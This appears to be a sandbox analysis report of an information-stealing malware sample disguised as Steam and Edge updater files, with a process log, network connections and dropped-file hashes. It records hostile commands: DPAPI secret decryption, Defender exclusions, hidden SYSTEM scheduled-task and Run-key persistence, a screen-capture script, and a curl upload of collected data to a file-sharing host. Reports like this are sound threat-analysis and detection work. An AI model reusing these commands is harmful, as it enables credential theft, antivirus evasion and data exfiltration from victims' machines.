powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,120,241,35,127,4,229,64,77,168,72,213,186,216,239,134,38,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,172,10,216,232,15,37,158,119,88,250,148,87,92,51,72,72,36,95,145,150,227,23,216,4,42,221,50,75,178,104,36,160,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,132,236,218,13,85,102,89,234,54,186,13,51,235,48,156,152,89,252,191,243,203,88,117,230,86,55,201,234,128,220,87,48,0,0,0,34,11,113,88,165,221,250,230,124,28,211,23,203,89,232,67,100,137,156,72,121,28,89,53,208,73,104,239,179,119,239,68,155,192,154,153,18,41,9,68,14,187,224,156,4,131,86,10,64,0,0,0,172,142,22,215,99,2,196,120,174,131,146,150,221,167,186,6,253,30,9,17,114,205,220,151,0,2,223,18,17,149,205,118,107,177,26,91,44,211,135,10,201,31,241,216,214,213,113,253,129,206,58,164,242,150,9,187,51,47,163,44,103,192,53,154), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.cmdline"

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6234.tmp" "c:\Users\Admin\AppData\Local\Temp\krkmaasn\CSC44B74D884DAD4622A95BCBBE83DD942.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Objiyuie.zip";"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Objiyuie.zip";

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

Network

Country Destination Domain Proto
US 8.8.8.8:53 6.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
BE 2.17.196.177:443 www.bing.com tcp
US 8.8.8.8:53 177.196.17.2.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 discordapp.com udp
US 172.67.74.152:80 api.ipify.org tcp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 172.67.74.152:80 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
US 172.67.74.152:80 api.ipify.org tcp
US 172.67.74.152:80 api.ipify.org tcp
US 8.8.8.8:53 api.filedoge.com udp
DE 49.13.193.134:443 api.filedoge.com tcp
US 172.67.74.152:80 api.ipify.org tcp
US 8.8.8.8:53 134.193.13.49.in-addr.arpa udp
US 8.8.8.8:53 29.17.21.2.in-addr.arpa udp
US 8.8.8.8:53 249.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 www.myexternalip.com udp
US 34.117.118.44:443 www.myexternalip.com tcp
US 172.67.74.152:80 api.ipify.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 mrbfederali.cam udp
US 172.67.205.179:443 mrbfederali.cam tcp
US 8.8.8.8:53 44.118.117.34.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 172.67.205.179:80 mrbfederali.cam tcp
US 172.67.74.152:80 api.ipify.org tcp
US 162.159.129.233:443 discordapp.com tcp
US 8.8.8.8:53 179.205.67.172.in-addr.arpa udp
US 172.67.74.152:80 api.ipify.org tcp
US 172.67.74.152:80 api.ipify.org tcp
US 172.67.74.152:80 api.ipify.org tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 24.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

memory/3780-72-0x00007FF849043000-0x00007FF849045000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aq4wilea.giu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3780-78-0x0000021BB0E30000-0x0000021BB0E52000-memory.dmp

memory/3780-83-0x00007FF849040000-0x00007FF849B01000-memory.dmp

memory/3780-84-0x00007FF849040000-0x00007FF849B01000-memory.dmp

memory/3780-85-0x0000021BCB1F0000-0x0000021BCB234000-memory.dmp

memory/3780-86-0x0000021BCB630000-0x0000021BCB6A6000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.cmdline

MD5 ab56a349f04b1e31027f2c58bfa705be
SHA1 2abd8fd5fa718170e9c7cae33bca0e276dc1d0a6
SHA256 e16117abceb2389623f0c7c0db67eafe369eb9bd6592f2b1d3db65d585ef9f3c
SHA512 ea7fe7d870158295d10a932197153e642806f8f989304d9d95c3072bbf1e72289755af3805664609b3be1ea203e82d38485ea6285a7a6cf30bfe2ddd086f9f12

\??\c:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\flpgohrl\CSCC6924A71820440CDA722ADBB1F6D8DF8.TMP

MD5 a6c6bbb20706990e27c03a0322d700e0
SHA1 bc3e684faf912edef993bffc8c2bd65c2e24dcdf
SHA256 d5a94ef34031ca5f15a883edf58646df6b9fa0bb5cc6ff483e846dfb06705556
SHA512 ae3868485e0f8603c3d552ec260357d020bc2ad3813d588f8d81b2bd812ada3df39d6f78991195bb086bbc75459bc4044234a06da75f671575f8b2d730eb6602

C:\Users\Admin\AppData\Local\Temp\RES5A93.tmp

MD5 0017610a01cb34f0215ef062dc2748a8
SHA1 67d54676bad6758846042a8164d5aa54c768c2a0
SHA256 d4deed446ea8e19ce25218b70ef25c12b93ff68b4151e7b8f0751da3996f35b4
SHA512 c1c8f91d262b6fb702ee16b8478a874049f5a888900914b7722232e1bfaebd5e66eadc420b10896580b00bf680611199b81e9ff966f62fd7621190d489aea8f1

memory/3780-99-0x0000021BB09C0000-0x0000021BB09C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\flpgohrl\flpgohrl.dll

MD5 df8387645da2f3cce8c379b20183039a
SHA1 889a56a4d4075e077f22921c1620230ad83f48b3
SHA256 176f946e70a599edd477b50c551f36db3cc4d7d954085aa4477fd1d6166883e9
SHA512 6b1531d92d2d1928d05d409251da6949a2fe27d6533aafa3fcae9a9f565dbbdc7a310732199bcb1a1a523bca1e67ed57cd4dcf86203224b5361afecdf9eec120

memory/3780-103-0x00007FF849040000-0x00007FF849B01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 3f01549ee3e4c18244797530b588dad9
SHA1 3e87863fc06995fe4b741357c68931221d6cc0b9
SHA256 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA512 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

memory/3276-115-0x0000022169920000-0x0000022169970000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2c9b93d38222869d090f809ed4513a80
SHA1 88eea1ce1162e12a461e4b4559cf84de14fe4db6
SHA256 ba3b84f9ba258a7d95da48afdc6c67e493a99810a2d912487884b91fdbd2b157
SHA512 9fb0486a49f7866710836735fd930287f29d715c4a77abb21f3b902d3062f655300c8aae7d5a0fb621bb7b44bd5075e26945a8e8505dbcf7c86e9362bb04cb2a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 25df8b13c12b231e5417dd1d60829aed
SHA1 c57a0e7929982a84daa0a0caadc534c00191a458
SHA256 88c71be7eeb45a51b1ec4726f433530563e95dc2ee5889daf3755c6e3bf5b301
SHA512 3620d93ef78f2e66a3cf3ab3b5344bc1646666c1f32092c89c0e79236dca31ced6e83a04ffefe651107c6874f8ead3bea4269873a8a650d9b8556107755f3cb3

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 93f90bda499e44e7497ed86627232b18
SHA1 711d3ed2e1d427dd6633ac3f1f258382694ac050
SHA256 e396e532af9adbdce7bf1f018313422779f32e750bc8193131525922334821c2
SHA512 edc2522ce9afef5bbaf9b89990ecb0913fe5d033979c1015682aa2fecde84bf4d757a484d744cf1bad78904e512b9b9632f3beedba1a743a13719216b0adfb4f

\??\c:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\krkmaasn\krkmaasn.cmdline

MD5 a6761d6679d0ce5c2a920b2f280f0ed4
SHA1 732fa4ef9ca2953ff241be83a31e8b122267c599
SHA256 dbf6c3d8f981b74f7020e36953395c13b9895cdbb813c67fc66cae6e12cb1092
SHA512 3f6e4d54e377c501c87f21d1200987d2c923266fa099b3b60a8a3b1918d4c5786341f0ca1895e267b276c07b5d99a9aa49dd16bf2274434bd4b3b5ef9a2efa65

\??\c:\Users\Admin\AppData\Local\Temp\krkmaasn\CSC44B74D884DAD4622A95BCBBE83DD942.TMP

MD5 59e15ebd26fa5082b65280ef0a93eccb
SHA1 de0a66f5f1e07e8a5bd65f8d716ee3b9b0a2bc3e
SHA256 bf103c1295c11d105d5017319d89775f3638c506fd5d782cc684c40e2ee0a9e6
SHA512 7127b7b92109d3328d32427cb87ea45194c08f9d79577ab5edabe36504da8bef773866da857768a23ac5f870f19e9b7bc08ddd7f815ee3ad17825432787a998f

C:\Users\Admin\AppData\Local\Temp\RES6234.tmp

MD5 b809b1c035eb6814be5c13a65fb58eeb
SHA1 377e1a49dfe003eb3017c783f781a689a1c6c272
SHA256 05cda0a6570ad80f4334c3b7d962dd07f68b20725bc9097b4dd4abe4e53c600a
SHA512 b81822cde82b2f5e46abd5a0c4a9417ee1572884b0b34006f12ba9820a75cb75d2748fda86a13aa3a5604f0c6ede98137f8e347da02c8671c962ef64d933d01a

